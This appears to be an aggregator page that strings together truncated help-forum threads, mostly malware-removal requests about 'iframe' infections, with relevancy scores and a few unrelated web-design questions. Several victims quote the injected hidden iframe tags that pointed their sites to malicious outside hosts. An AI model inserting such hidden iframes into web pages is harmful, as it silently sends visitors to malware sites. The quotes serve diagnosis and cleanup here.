Is the ComboFix log enough to tell if infected, or do I need to go through all the stuff listed in the prep guide?

Thanks in advance for any help you can render.

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc...

A: Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

Please take note:

If you have since resolved the original problem you were having, we would appreciate you letting us know.
If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics just post what you can and we will guide you.
Please tell us if you have your original Windows CD/DVD available.
If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information.
If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review your topic and do their best to resolve your issues.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '...

Q: <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hi Guys,

I have a problem with my computer.
Looks like I have a virus/malware inside my computer. I have to try to restore using system restore, seems it doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when I open it again, it's still there.

Can somebody please help me, because I still have a lot of work that must be finished Monday, and I can't continue to work if my computer still behaves like this.

Here is the log file I created for you guys using DDS. Thanks for your help.

A: <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the resul...

RELEVANCY SCORE 54.8

I have a small network that consists of about 4 PCs and a web server. There has been some sort of virus infecting my web server. The virus injects my index.html files with malicious lines of code directing users to a virus-infected site. I am thinking that the virus is on one of my client PCs connecting to the server via FTP. I have run multiple scans on the server and found nothing. Now I am leaning towards the PCs. I have posted the logs of the first PC to review.

Here is an example of the line of code this virus is putting in the index.html file of the websites:

<iframe src="http://woocasino.com/s2/show.php" width="1" height="1" style="display:none;"></iframe></body>

A:Infected with Iframe virus

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll...

RELEVANCY SCORE 54.8

I have a laptop running windows 7, eset security ver 4 and malwarebytes.
 
I ran a computer scan with eset and got the message saying I was infected with this virus and gave 2 different paths. It didn't give me the option to clean, only delete and do nothing. So I deleted the files, but they keep coming back. I'm not at my computer to send a screenshot.
 
Please let me know what I need to do to start the process of getting this virus out of my laptop, it's driving me nuts!

A:Infected with HTML/Iframe.B.Gen

Hello danny, reboot into Safe Mode with Networking...

Empty your temp folders using TFC (Temporary File Cleaner)
Please download TFC by Old Timer and save it to your desktop.
alternate download link
Save any unsaved work. (TFC will close ALL open programs including your browser!)
Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)
Click the Start button to begin the cleaning process and let it run uninterrupted to completion.
Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.
Run ESET again.

RELEVANCY SCORE 54.8

My kids were on a MySpace page watching videos the other night and now if I try to go online for anything my avast software goes nuts and I get the line in the title. It says it is in the temp. internet files folder. I shut the computer down and let avast do a complete scan and I ran spybaster and AVG. All to no avail. So I come once again to the great guys and gals here at tech support for help. I also have a strange thing happen when I try to move a file: it moves but also brings up a box from Easy CD Creator and wants me to put in the CD to install. I don't even use that program. Weird. Below I have enclosed the files you asked for (DDS & Attach & GMER). Any help would be greatly appreciated.


A:Infected with hxxp:IFrame-HW[Trj]

Hello -

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

---------------------------------------------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Stay with me until given the 'all clear' even if symptoms diminish. Lack of symptoms does not always mean the job is complete.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by me or another helper at this forum.

---------------------------------------------------------------------------------------------

Download ComboFix from this location:

Link 1

* IMPORTANT !!! Place combofix.exe on your Desktop
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the Sy...

RELEVANCY SCORE 54.4

I posted late last night about getting a virus that took over my computer. Well, I've been working on my brother's computer today and it is now infected, and I believe that the virus is in Evernote. I think I may even know the exact file that's spreading it. I feel bad for my brother because he doesn't have a lot of money to get a new computer. My computer that was infected is my work computer and I am shipping it back to them for a format and reinstall. My brother's computer, the one that is infected now, is running Windows 8 Beta on a Dell latitude E 6500. As far as I can tell, without doing any more clicks or actions on my computer, it has taken over Internet Explorer with mirroring. Wow, I really want to squash this virus. This would be the second computer of mine that it's infected today. I REALLY want to squash this virus. Having just found this site last night, it's amazing what you guys are doing here. I thank each and every one of you who are donating their time to help others not so lucky to be as computer savvy. Okay so now, who's going to take this mother effort down?

A:The 2nd computer infected by Mal/Iframe-AH today

Hello, let's see what we can find ....

MiniToolBox
Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size.
Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

>>>>>
Please Download TDSSkiller
Launch it. Click on change parameters - Select TDLFS file system
Click on "Scan".
Please post the LOG report (log file should be in your C drive)
Do not change the default options on scan resu

>>>>
Please download Malwarebytes Anti-Malware and save it to your desktop.
Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.
Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
Make sure you are connected to the Internet and double-click on the renamed file to install the application.
When the installation begi...

RELEVANCY SCORE 54.4

Anyone heard of this bot? My internet provider recently disabled my internet and they said I had a bot with that name attempting to get into their server. I did a scan, and found some other bot, and deleted it. Anyone know anything about this virus? The dude on the tech support said he'd never heard of it.

A:visited-virut-infected-iframe

Haven't heard of it described exactly like that, but every AV vendor names things a bit differently. If you truly have that infection, your machine needs to be formatted.

Virut is a polymorphic file infector, capable of infecting all the machine's executable files (.exe) and screensaver files (.scr). However, the problem is that the virus has a number of bugs in its code, and as a result, it may misinfect a proportion of executable files and therefore, the files are corrupted beyond repair. As of now, security experts suggest that a format and clean install, or destructive recovery if you have an OEM recovery partition, is the best way to clean the infection and it is the best and safest way to return the machine to its normal working state.

Backup all your documents and important items (personal data, work documents, etc) only. DO NOT backup any executable files (softwares) and screensavers (*.scr). It attempts to infect any accessed .exe or .scr files by appending itself to the executable.

Also, avoid backing up compressed files (zip/cab/rar) files that have .exe or .scr files inside them. Virut can penetrate and infect .exe files inside compressed files too.

Recent variants also modify htm, html, asp and php files, injecting them to redirect to malicious sites.

Here's a sample writeup:

http://community.ca.com/blogs/securi...the-loose.aspx

Do not back up to another machine, as it may become compromised. Burn to DVD/CD, or to an external drive which has ...

RELEVANCY SCORE 54.4

I ran ESET online scanner because my PC was running slow and found the HTML/Iframe.B.Gen virus.

What are the steps to getting rid of it forever?
 

A:I'm infected with the HTML/Iframe.B.Gen virus - help!

http://speccy.piriform.com/results/pGSzT8aH8JrdO3TzDA5MuSy
 

RELEVANCY SCORE 53.6

Hello,
 
I am using Avast which began alerting me every time I opened a webpage, that it was infected with js:iframe via privoxy.exe.  I have downloaded both AdwCleaner and Farbar Recovery Scan Tool.  The logfile from Adwcleaner is as follows:
 

A:Infected with Js:iframe/privoxy.exe trojan downloader?

Hi & welcome to Bleeping Computer Forums!

My name is Jürgen and I will be assisting you with your Malware related problems. Before we move on, please read the following points carefully:

My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
Do not run any other scans without instruction or Add/Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
If I don't reply within 24 hours please PM me!
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.

Step 1
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
Please download...

RELEVANCY SCORE 52

Beginning 3/25 I started receiving virus alerts from Avira AntiVir Personal. Here is the first one:

<< Virus or unwanted program 'HTML/IFrame.DO.54 [virus]'
detected in file 'C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\EP52U43K\obana[9].htm.
Action performed: Deny access >>

This was also detected in certain other random recent directories under Content.IE5. Some of them appear to be accumulating junk -- css files, jpegs, html files -- from web sites I have never visited.

Please note: I do not use Internet Explorer! I use Firefox. So, there may be some malware downloading junk in the background.

Thank you!


A:Infected with 'HTML/IFrame.DO.54 [virus]'; IE temp dirs fill with junk

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.
===
Download ATF Cleaner by Atribune from here or here and save it to your Desktop.
Follow the instructions for the browser you use.
Read the instructions about the cookies. Delete what you do not need.
Double click ATF-Cleaner.exe to run the program.
Check the boxes to the left of:
Windows Temp
Current User Temp
All Users Temp
Temporary Internet Files
*Prefetch (Windows XP) only.
Java Cache
The rest are optional - if you want to remove the lot, check "Select All".
Finally click Empty Selected. When you get the "Done Cleaning" message, click OK.
If you use the Firefox or Opera browsers, you can use this program as a quick way to tidy those up as well.
When you have finished, click on the Exit button in the Main menu.
For Technical Support, double-click the e-mail address located at the bottom of each menu.

* The purpose of Prefetch folder is to increase the speed at which you can access the programs that you use on your PC. Unfortunately, Windows doesn't differentiate between a program you use every day and one you use every blue moon, which means that it may be prefetching a lot of stuff that you rarely use, adding to your startup time. You may find that the first time you boot up after cleaning out this folder, your PC takes longer to get into gear - the ...

RELEVANCY SCORE 38.8
Q: iframe

How do I clear the iframe in Netscape 7.0 and Internet Explorer? The following code works in IE but not in Netscape.

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width="...

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

Post the site's URL and I will check out the code....... if I can see it.

d.
 

RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it, and unscrollable too. Can I tell the browser(s) to do this, and how? Please help.
 

A:Still Iframe - Please Help

RELEVANCY SCORE 38.4

Description of my problem: We are seeing instability in our local network, which is due to the spread of malware through it. The malware uses an ARP-based attack against the local network gateway (192.168.1.1). Machine "A", owner of the MAC address "MacA", sends ARP broadcast packets on the network indicating that the gateway is machine A (192.168.1.1, the right address of the gateway, is at "MacA"), so many machines in our network use a wrong ARP entry (I mean the MacA of the machines infected by this malware).

After a long check on them to identify this malware, we found that these machines were infected by: "svchost.exe" (175 KB, 179200 bytes), which uses the DLLs Packet.dll, wpcap.dll and wanpacket.dll, and ... \ drivers \ npf.sys.
- It performs a scan of all the networks 192.168-, 172.16- and 10.0-
- It has a "80-port insert" in the svchost packet
- Lastly, we have another problem: when we open a web page (in IE or Firefox), before we get the response, which takes two or three seconds, the page displays a little gray bar (whether we use a Windows or Linux system), and view page source returns this hxxp://218.75.91.248/iframe, and this is included in the svchost.exe packet but it was encrypted.
- Can somebody help me and explain how we can resolve this and clean our local network of this malware? Thanks in advance.

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

RELEVANCY SCORE 38.4

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf. In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times. Chrome also does this redirect but doesn't end up forcing a logout. Copying the source url from the iframe into a new tab in IE doesn't force the logout and retrieves the pdf just fine which means it is directly related to this server's handling of iframes specifically in all IE browsers we support (IE 9+). This scenario is unique to a specific server and doesn't happen on "identical" server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

RELEVANCY SCORE 38.4

Hello Gracious Help,

I run XP Pro on a Pentium 4, 3ghz (Dell GX270).

3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a bestiality site and a zoo site - neither of which I have ever been to.

Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-inf

A web search came up with a few complex suggestions on how to get rid of or fix this problem, but all were too complex for me to follow.

The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such...

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO...

RELEVANCY SCORE 38.4

I'm tired of searching for an iframe alternative... after so much searching I can't get what I wanted.

I'm trying to include another domain's HTML page in my HTML-based email templates. Is there any other way, other than an iframe, to include HTML pages from another domain in my HTML coding?
 

RELEVANCY SCORE 38.4

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook Express 6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

Is my computer infected?
 

A:Exploit/iFrame

RELEVANCY SCORE 38.4

Hi,
I work on portals. In the ePhox editLive editor I am using an iFrame which in turn displays an intranet site within this iFrame. This site includes a select box for locations. When the site is displayed the first time, the select box is not visible to the end user, but when we click on any button and this page renders again, the select box is also available.
I right-clicked on the site when the select box doesn't appear, but to my surprise the code for the select box is there in view source. I don't get why it is not visible if the code is there in view source.
Also, when I open this site in Internet Explorer without any iframe, the select box is visible there.

Can anyone please help with why it is happening like that?

Regards,
Rohit Sharma

RELEVANCY SCORE 38.4

My PC was working very well and had no problem. I turned it off after my work one night and when I switched it on the next morning it did not open my home page. When I try to open my antivirus, Avast gives me a warning. The name of the virus is HTML:Iframe-inf. Please help me to get rid of this. I am not able to open my home page.
Moreover, my system has become very slow, especially during start-up. Please help.
Thank you!

RELEVANCY SCORE 38.4

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put a copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.

QUESTIONS:
1 - Does this Malwarebytes program have any problems with other antivirus programs running?
2 - Will this program get rid of the iframe virus?
3 - I noticed a strange program in my msconfig StartUp; it was named freddy42. I have disabled it. I have checked and now know it is part of this virus.
4 - Should I have disabled freddy 42? I think that is why I may be still infected.
5 - Do I need to have all programs enabled in my StartUp to ensure complete virus removal?
6 - Can the infected computer infect the laptop? It is on a shared network. I have disabled all sharing folders and files with the infected computer.

I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

A:IFrame Virus

In answer to question one
Programs that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabled
In answer to number two post a log and we'll take it from there
Disable freddy42 using Autoruns
http://technet.microsoft.com/en-us/sysinte...s/bb963902.aspx
Number 5 - no
Number 6 - yes
Are you using a digital picture frame? Whatever USB attachment it is, do not use it right now
I'm moving this to AII
-----------------------------------------------------
The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.
Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-...

RELEVANCY SCORE 38.4

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?
 

A:IFrame Problems

RELEVANCY SCORE 38.4

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesn't fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided it's the best way to accomplish what I want.
 

A:Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.
 

RELEVANCY SCORE 38.4

I have just had 3 security alert messages from AVIRA, don't know if it would have any connection:
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspicious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO

A:JS/Dldr.Iframe.BO

RELEVANCY SCORE 38.4

On my site I have a link I use for users to view tax records in my county, and I would like to have the users not leave my site, so I used an iframe. But I'm having an issue: after agreeing to their usage terms, users cannot access the site, or it doesn't redirect to the corresponding/next page, as in "enter here", and I can't bypass it because it will auto redirect. Any suggestions WITHOUT using a new page or opening in a new window?

www.townhousesandvillas.com/taxrecords.html

Oh, and take it easy on me... I'm new.
 

A:iframe or equal...

RELEVANCY SCORE 38.4

Alright, here's the deal: I have a transparent iframe with the content visible, but the scrollbars are transparent and I don't want that... so is there any way to have a transparent iframe with visible content and visible scrollbars?
 

A:Transparent iFRAME

RELEVANCY SCORE 38.4

OK... so what I want to do is have an iframe over top of an image (which I have figured out), but then I want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. I've read a ton of stuff about transparency and opacity and I've tried a few different things; none seem to work, though. I've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

Please help, and thanks in advance.

carson

PS - think of it like a layer in Photoshop where you can just change the opacity to have the layer behind it show through.
 

A:Need help with iframe opacity...

Well, I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linked to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! All I can offer is an idea...
 

RELEVANCY SCORE 38.4

Hi Folks,

From threatpost: New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9

Cheers
KarstenHansen

RELEVANCY SCORE 38.4

In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
...

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca...

RELEVANCY SCORE 38

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on these websites, then seems to go away after a day or two, and a similar problem may occur when accessing a different website.

One example of the threat warning is:

Object:
http://jclao.com/archives/1283

Threat:
HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
"www.jdbbank.com/gadgets/gadgets.php"
IP address:
61.19.241.97:80

The website owners claimed they have checked their site with several checkers and found no virus, although jdbbank did have a legitimate link on their site.

I later got a similar message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

.
DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
.
AV: ESET NOD32 Antiv...

A:Iframe.B.Gen and or Kryptik.E virus

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.

The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

RELEVANCY SCORE 38

I am running Windows XP Home Edition SP3 and while clicking on a link trying to find the lyrics to a certain song last night, Avast alerted me to a Virus/Worm. It went through the whole routine of freezing everything up and not being able to close the windows, but eventually I instructed Avast to delete it. I then did a full Avast scan in safe mode and everything was clean except for this one line:

Name Of File: C:\Documents and Settings\Sean\Local Settings\Temporary Internet Files\Content.IE5\SEIGLIUM\search[1].htm
Result: Infection: HTML:Iframe-inf (it could be lframe-inf but I couldn't tell from the readout)

Is this anything to worry about? Is it safe to assume that since it was in the Temporary Internet Files folder for IE5 and not in a System folder then it's not that much of a threat? Since I'm running IE7, do I even need any IE5 files? Couldn't I just delete the entire IE5 content folder?

Today, I did another half a dozen full scans in safe mode with Malwarebytes' Anti-Malware, SUPERAntiSpyware, Spybot S&D, SpywareBlaster, a-squared, RogueRemover, etc. and they all came up clean. Please advise me of anything else I can do that might help.

I am going to run another full Avast scan tonight in safe mode just to be sure that it's completely gone. Also, I notice that when I run Avast in safe mode it says, "Resident Protection: Disabled" - is this normal? It's usually set to either Normal or Custom dependin...

A:Infection: HTML:Iframe-inf

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights".
Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.
When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.
